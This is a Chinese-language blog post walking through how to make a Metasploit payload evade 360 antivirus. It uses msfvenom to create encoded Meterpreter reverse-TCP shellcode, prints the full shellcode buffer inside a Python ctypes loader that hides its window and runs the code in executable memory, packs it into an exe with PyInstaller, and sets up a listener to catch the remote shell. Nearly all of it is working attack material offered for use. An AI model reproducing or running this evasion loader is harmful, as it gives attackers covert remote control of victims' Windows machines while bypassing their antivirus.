Metasploit+python生成免杀exe过360杀毒

Posted 2020-09-15

Metasploit+python生成免杀exe过360杀毒

1在kali下生成一个反弹的msf的python脚本,命令如下：

msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.1681.102  -e x86/shikata_ga_nai -i 11 -f py -o  /opt/bk.py

 

2.拷贝出bk.py到window32系统进行修改，修改如下（这里的红色标注是修改增加的代码，其他不变）

from ctypes import *

import ctypes

buf =  ""

buf += "\\xbb\\x7a\\x62\\x0a\\x22\\xdb\\xc9\\xd9\\x74\\x24\\xf4\\x58\\x29"

buf += "\\xc9\\xb1\\x97\\x31\\x58\\x15\\x03\\x58\\x15\\x83\\xe8\\xfc\\xe2"

buf += "\\x8f\\xdc\\x50\\xbc\\x22\\x5d\\xbf\\x0c\\x65\\xe9\\x1b\\x79\\xcd"

buf += "\\x39\\xad\\x30\\x7c\\x0c\\x5d\\x21\\xfd\\x87\\x61\\x46\\x2b\\xc8"

buf += "\\x35\\xc0\\x38\\x81\\xbf\\xd5\\xb9\\xd7\\x14\\x0c\\xcb\\x00\\x79"

buf += "\\x12\\x5d\\xd0\\xb1\\xee\\xfe\\x06\\x1d\\x51\\x8a\\x92\\x29\\xd2"

buf += "\\xa4\\x4c\\xd0\\x08\\x22\\xdc\\x4f\\x24\\xb2\\x2b\\x2b\\xda\\x00"

buf += "\\x5f\\xa3\\x1d\\x01\\xfe\\xe9\\xf2\\x62\\xeb\\xa7\\x46\\x63\\xce"

buf += "\\xac\\x45\\xe4\\x8b\\xa1\\xa3\\x85\\x14\\xe1\\x1e\\x06\\xa7\\x6e"

buf += "\\x7a\\x03\\xe7\\x05\\xd2\\x41\\x32\\x24\\x3c\\x48\\x72\\xf2\\x57"

buf += "\\x0f\\x58\\x58\\x5c\\xf6\\xd5\\x0f\\x5b\\x6b\\xca\\x34\\xdd\\x5d"

buf += "\\xe0\\x62\\x5a\\xc2\\xde\\x3d\\xdc\\xb3\\xf0\\x3e\\x78\\x31\\x90"

buf += "\\x6c\\x5f\\x58\\xee\\x84\\xb0\\x30\\x87\\x60\\xec\\x58\\x25\\xad"

buf += "\\x4a\\x6b\\xc6\\xb7\\xd8\\x70\\xb8\\x2f\\xc8\\xd9\\xcf\\xec\\x10"

buf += "\\xcb\\x67\\x90\\xf2\\xdf\\xf2\\x4a\\xf3\\x23\\xf6\\xd1\\x12\\xa5"

buf += "\\xfb\\x10\\xa9\\x56\\x4e\\xd0\\xdc\\x10\\x21\\x1d\\xb5\\x58\\x17"

buf += "\\xe1\\x6d\\x69\\x74\\xc7\\xac\\x58\\x1a\\xc9\\xf7\\x00\\xf8\\x54"

buf += "\\x76\\x05\\x6d\\xd4\\x9e\\x9c\\x22\\xdb\\x0f\\xa9\\xfa\\xe3\\x8b"

buf += "\\x8e\\x1a\\x1f\\x60\\xdb\\xbe\\xef\\x2f\\x73\\xa5\\x42\\x02\\x93"

buf += "\\x89\\x0f\\x42\\xfa\\xae\\xb9\\x9b\\xec\\xe2\\x53\\x56\\x38\\x51"

buf += "\\x45\\x6f\\xb8\\xd2\\xff\\x3a\\x73\\x44\\xe4\\x38\\x38\\xf2\\x28"

buf += "\\x76\\xf0\\xca\\x34\\x80\\x35\\x55\\x83\\xad\\x29\\x23\\x8a\\xca"

buf += "\\x07\\xcf\\x88\\x30\\x15\\x2e\\xc0\\x99\\x1e\\xdd\\xb6\\xbb\\x49"

buf += "\\x92\\x1e\\x9a\\xdd\\xcf\\x58\\xe9\\x84\\x66\\x3d\\x38\\xfc\\x28"

buf += "\\x99\\xa4\\x19\\x09\\xe6\\x1c\\xf5\\xad\\x4f\\xa1\\x81\\xbf\\x51"

buf += "\\x3d\\x0b\\x9e\\x27\\x60\\x20\\x7d\\x59\\x6e\\x82\\x7c\\x25\\x5c"

buf += "\\x4e\\x34\\x25\\xed\\xc3\\xb1\\x45\\x02\\x92\\x75\\xf5\\x11\\xa5"

buf += "\\x54\\xdc\\x1b\\x6f\\x9b\\x56\\xd2\\xb5\\x80\\x66\\xcf\\xe1\\x61"

buf += "\\xd1\\x01\\xe4\\x31\\x52\\xd9\\x5b\\x01\\x37\\x29\\xa8\\xef\\xc8"

buf += "\\x53\\x9b\\x1c\\x47\\x30\\x9e\\xe4\\x6a\\xda\\xb3\\xd5\\xfd\\xf5"

buf += "\\xb8\\x13\\xbc\\x92\\xbb\\xb4\\x82\\x70\\x02\\xad\\xef\\x3b\\x70"

buf += "\\xf4\\x98\\x84\\x31\\x52\\x97\\x60\\x2b\\x2e\\x84\\x9b\\x7f\\xb7"

buf += "\\x30\\x85\\x58\\xef\\x8c\\x95\\xa0\\x56\\x2f\\xef\\x20\\x61\\x0d"

buf += "\\x94\\x66\\xbf\\xa7\\xd0\\x71\\x56\\x52\\x82\\xb1\\xa0\\x19\\xe4"

buf += "\\x7e\\xd9\\x90\\x96\\x2b\\x16\\xea\\x4c\\xde\\xcd\\x05\\x23\\x6e"

buf += "\\xc2\\x4b\\xc0\\x68\\x1b\\xba\\xc1\\x1d\\xca\\x26\\x74\\xd1\\x92"

buf += "\\x4e\\xd3\\x70\\x8a\\x43\\x41\\xbe\\x59\\xf1\\x20\\x33\\x89\\xb9"

buf += "\\x2b\\xdb\\x9a\\x0f\\xad\\x8d\\x80\\x4c\\x78\\x52\\xe7\\x0a\\xf7"

buf += "\\x47\\xd8\\x5c\\x0c\\x3c\\xd4\\x0d\\x3d\\xe7\\xbd\\x2d\\x22\\xb1"

buf += "\\x37\\x0a\\xd9\\x5e\\xf2\\xd5\\xd2\\x56\\xe0\\x56\\x1c\\x42\\xc3"

buf += "\\x75\\x92\\x55\\x7c\\x86\\x6a\\xb4\\xcd\\x3a\\xce\\x4d\\xea\\x4f"

buf += "\\xa4\\x31\\xc6\\xe0\\x16\\x27\\xa5\\xf4\\x9d\\x79\\x5e\\xfc\\x60"

buf += "\\xeb\\xef\\x35\\x33\\x6e\\x5b\\x6d\\xec\\x8f\\x9b\\x1e\\xb1\\xf6"

buf += "\\x35\\xeb\\x1f\\x3b\\xab\\x99\\x9a\\x34\\x2a\\xf8\\x25\\x38\\xba"

buf += "\\x40\\xe9\\xb0\\x51\\xbc\\xdf\\x60\\x16\\x62\\xc3\\x63\\x64\\xbd"

buf += "\\xb5\\x28\\xf6\\x4c\\x71\\xd2\\x01\\x74\\x11\\xf0\\xd7\\xcd\\x4f"

buf += "\\x34\\xad\\xc2\\x65\\x4c\\xeb\\x78\\xc1\\xbf\\xba\\x80\\x6c\\x46"

buf += "\\x6a\\x15\\x15\\x03\\x5e\\x8d\\x65\\x8e\\x69\\x89\\x29\\x7f\\x67"

buf += "\\xea\\xc1\\x6b\\x62\\xb0\\xd4"

 

#libc = CDLL(‘libc.so.6‘)

PROT_READ = 1

PROT_WRITE = 2

PROT_EXEC = 4

def executable_code(buffer):

    buf = c_char_p(buffer)

    size = len(buffer)

    addr = libc.valloc(size)

    addr = c_void_p(addr)

    if 0 == addr: 

        raise Exception("Failed to allocate memory")

    memmove(addr, buf, size)

    if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):

        raise Exception("Failed to set protection on buffer")

    return addr

VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc

VirtualProtect = ctypes.windll.kernel32.VirtualProtect

shellcode = bytearray(buf)

whnd = ctypes.windll.kernel32.GetConsoleWindow()   

if whnd != 0:

       if 666==666:

              ctypes.windll.user32.ShowWindow(whnd, 0)   

              ctypes.windll.kernel32.CloseHandle(whnd)

print ".................................."*666

memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),

                                          ctypes.c_int(len(shellcode)),

                                          ctypes.c_int(0x3000),

                                          ctypes.c_int(0x40))

buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

old = ctypes.c_long(1)

VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))

ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),

                                     buf,

                                     ctypes.c_int(len(shellcode)))

shell = cast(memorywithshell, CFUNCTYPE(c_void_p))

print "Code By Luan"

shell()

 

3.在windowsx86上安装支持python的环境，下载pywin32 解压运行，一直点下一步就可以了

4.然后下载支持将python生成exe的软件pyinstall ，解压然后执行以下命令:

D:\\miansha\\pyinstaller-2.0>python PyInstaller.py --console --onefile  bk.py

注意这里不要有中文路径，否则会出错

 

5.执行命令后会在d:\\pyinstaller-2.0\\bk\\dist目录生成bk.exe

 

 

6.这里我将在windowsx86上安装最新的360杀毒软件，进行查杀测试

 

 

 

7.然后在kali下启动msf，然后执行以下命令：

use exploit/multi/handler

set lhost 192.168.1.102

set lport 443

set PAYLOAD windows/meterpreter/reverse_tcp

exploit

 

8.然后在windowsx86系统上执行bk.exe,最终在msf反弹出meterprer 出来：